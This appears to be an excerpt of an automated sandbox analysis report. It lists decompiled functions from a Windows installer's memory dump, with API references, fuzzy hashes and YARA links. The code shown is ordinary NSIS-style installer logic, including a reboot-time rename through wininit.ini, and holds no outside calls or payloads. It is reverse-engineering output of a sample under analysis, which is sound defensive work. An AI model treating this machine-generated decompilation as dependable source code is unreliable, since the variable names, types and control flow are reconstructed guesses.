            0x00000000
            0x004039ca
            0x00403963
            0x00403969
            0x00000000
            0x00000000
            0x00403975
            0x0040397b
            0x0040397d
            0x00000000
            0x00000000
            0x00403983
            0x00403988
            0x00000000
            0x00403988
            0x0040394a
            0x00000000
            0x00403926
            0x0040392c
            0x00403936
            0x00403d4f
            0x00403d56
            0x00403d64
            0x00403d6a
            0x00403d6a
            0x00403d74
            0x00000000
            0x00403d74
            0x00403924

            APIs
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
            • ShowWindow.USER32(?), ref: 00403918
            • DestroyWindow.USER32 ref: 0040392C
            • SetWindowLongA.USER32 ref: 0040394A
            • IsWindowEnabled.USER32 ref: 00403975
            • GetDlgItem.USER32 ref: 004039A3
            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
            • IsWindowEnabled.USER32(00000000), ref: 004039C2
            • GetDlgItem.USER32 ref: 00403A6A
            • GetDlgItem.USER32 ref: 00403A74
            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
            • GetDlgItem.USER32 ref: 00403B86
            • ShowWindow.USER32(00000000,?), ref: 00403BA6
            • EnableWindow.USER32(00000000,?), ref: 00403BB5
            • EnableWindow.USER32(?,?), ref: 00403BD0
            • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
            • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
            • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
            • ShowWindow.USER32(?,0000000A), ref: 00403D64
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
            • String ID:
            • API String ID: 3950083612-0
            • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
            • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
            • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
            • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
            Download Yara Rule
            C-Code - Quality: 92%
            			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79f568 =  *0x79f568 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E0E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f84, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f84, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040417A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EBB;
				E00403DA7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DA7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DDC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f88 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79e54c =  *0x79e54c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79f568 =  *0x79f568 & 0x00000000;
				return 0;
			}

















            0x00403eff
            0x00404025
            0x00404081
            0x00404085
            0x0040415c
            0x0040415e
            0x0040415e
            0x00404164
            0x00404164
            0x00404167
            0x00000000
            0x0040416e
            0x00404093
            0x00404095
            0x0040409f
            0x004040aa
            0x004040ad
            0x004040b0
            0x004040bb
            0x004040be
            0x004040c5
            0x004040d3
            0x004040eb
            0x004040fe
            0x0040410e
            0x00404110
            0x00404110
            0x004040c5
            0x0040411a
            0x00000000
            0x00404125
            0x00404129
            0x0040413a
            0x0040413a
            0x00404140
            0x0040414e
            0x0040414e
            0x00000000
            0x00404152
            0x0040411a
            0x00404030
            0x00000000
            0x00404044
            0x0040404a
            0x00404050
            0x00000000
            0x00000000
            0x00404075
            0x00404077
            0x0040407c
            0x00000000
            0x0040407c
            0x00404030
            0x00403f05
            0x00403f08
            0x00403f0d
            0x00403f1e
            0x00403f1e
            0x00403f25
            0x00403f28
            0x00403f2a
            0x00403f2f
            0x00403f38
            0x00403f3e
            0x00403f4a
            0x00403f4d
            0x00403f56
            0x00403f5b
            0x00403f5e
            0x00403f63
            0x00403f7a
            0x00403f81
            0x00403f94
            0x00403f97
            0x00403fac
            0x00403fb3
            0x00403fb8
            0x00403fbd
            0x00403fbd
            0x00403fcc
            0x00403fdb
            0x00403fdd
            0x00403ff3
            0x00404002
            0x00404004
            0x00000000

            APIs
            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
            • GetDlgItem.USER32 ref: 00403F8E
            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
            • GetSysColor.USER32(?), ref: 00403FBD
            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
            • lstrlenA.KERNEL32(?), ref: 00403FE5
            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
            • GetDlgItem.USER32 ref: 00404065
            • SendMessageA.USER32(00000000), ref: 00404068
            • GetDlgItem.USER32 ref: 00404093
            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
            • LoadCursorA.USER32 ref: 004040E2
            • SetCursor.USER32(00000000), ref: 004040EB
            • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
            • LoadCursorA.USER32 ref: 0040410B
            • SetCursor.USER32(00000000), ref: 0040410E
            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
            • String ID: N$open
            • API String ID: 3615053054-904208323
            • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
            • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
            • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
            • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1;
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405624(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















            0x00405715
            0x0040571c
            0x00405720
            0x00405729
            0x0040572d
            0x00405879
            0x00405879
            0x00000000
            0x00405879
            0x0040572d
            0x00405739
            0x0040574f
            0x00405777
            0x00405782
            0x00405786
            0x004057a9
            0x004057b1
            0x004057bd
            0x004057d4
            0x004057da
            0x004057df
            0x00000000
            0x00000000
            0x004057ee
            0x004057f0
            0x004057fd
            0x00405801
            0x00405872
            0x00405873
            0x00000000
            0x0040581d
            0x0040582a
            0x0040588f
            0x00405896
            0x0040583d
            0x0040583d
            0x0040583f
            0x00405848
            0x00405853
            0x00405865
            0x0040586c
            0x00000000
            0x0040586c
            0x00405898
            0x0040589e
            0x004058a0
            0x004058af
            0x004058af
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004058a2
            0x004058a2
            0x004058a4
            0x004058a7
            0x004058ab
            0x00000000
            0x004058a2
            0x00405835
            0x0040583a
            0x00000000
            0x0040583a
            0x00405801
            0x00405751
            0x0040575c
            0x00405765
            0x00405769
            0x00000000
            0x00000000
            0x00405769
            0x00405883

            APIs
              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
            • GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
            • GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
            • wsprintfA.USER32 ref: 004057A0
            • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
            • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
            • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
            • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
            • GlobalFree.KERNEL32 ref: 0040586C
            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
            • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
            • API String ID: 3633819597-1342836890
            • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
            • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
            • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
            • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E004045FA(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E0040521C(0, _t110);
								E004054CC(_t151);
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);
					E00403DDC(_t144);
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}




































            0x004041eb
            0x004041f2
            0x004041fe
            0x0040420c
            0x00404214
            0x00404218
            0x0040421e
            0x0040421e
            0x0040422a
            0x004042a4
            0x004042ab
            0x00404377
            0x0040437e
            0x0040438d
            0x0040438d
            0x00404391
            0x00404397
            0x0040439a
            0x004043a7
            0x004043a9
            0x004043a9
            0x004043b7
            0x004043bd
            0x004043c4
            0x004043c6
            0x004043c6
            0x004043d3
            0x004043df
            0x00404403
            0x00404414
            0x0040441a
            0x0040441c
            0x00000000
            0x00000000
            0x00404422
            0x00404422
            0x00404430
            0x00000000
            0x004043e1
            0x004043e4
            0x004043e8
            0x004043ec
            0x004043ed
            0x004043f2
            0x00000000
            0x00000000
            0x004043fa
            0x00404432
            0x00404432
            0x00404439
            0x00404442
            0x00404444
            0x00404444
            0x00404456
            0x00404460
            0x00404468
            0x0040447e
            0x0040446a
            0x0040446e
            0x0040446e
            0x00404468
            0x00404483
            0x00404488
            0x0040448d
            0x00404496
            0x00404496
            0x0040449f
            0x004044a1
            0x004044a1
            0x004044ad
            0x004044b5
            0x004044bf
            0x004044bf
            0x004044c4
            0x00000000
            0x004044c4
            0x004043df
            0x00404380
            0x00404387
            0x00000000
            0x00000000
            0x00000000
            0x00404387
            0x004042b1
            0x004042b7
            0x004042d1
            0x004042d6
            0x004042e0
            0x004042e7
            0x004042ec
            0x004042f6
            0x004042f9
            0x004042fc
            0x00404303
            0x0040430b
            0x0040430e
            0x00404312
            0x00404319
            0x00404321
            0x00404370
            0x00404323
            0x00404324
            0x0040432a
            0x00404334
            0x0040433c
            0x0040433e
            0x0040433f
            0x00404341
            0x00404347
            0x00404355
            0x00404359
            0x00404359
            0x00404355
            0x0040435e
            0x00404369
            0x00404369
            0x00404321
            0x00000000
            0x004042d6
            0x004042c4
            0x00000000
            0x00000000
            0x004042ca
            0x00000000
            0x0040422c
            0x00404237
            0x00404240
            0x0040424d
            0x0040424d
            0x00404257
            0x0040425c
            0x00404265
            0x00404268
            0x0040426d
            0x00404275
            0x00404278
            0x0040427d
            0x00404283
            0x00404292
            0x00404299
            0x004044ca
            0x004044dc
            0x004044dc
            0x004042a2
            0x00000000
            0x004042a2

            APIs
            • GetDlgItem.USER32 ref: 00404230
            • SetWindowTextA.USER32(00000000,?), ref: 0040425C
            • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
            • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
            • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
            • SetDlgItemTextA.USER32 ref: 00404369
              • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
            • SetDlgItemTextA.USER32 ref: 0040447E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
            • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
            • API String ID: 2007447535-1909522251
            • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
            • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
            • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
            • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
            Uniqueness

            Uniqueness Score: -1.00%

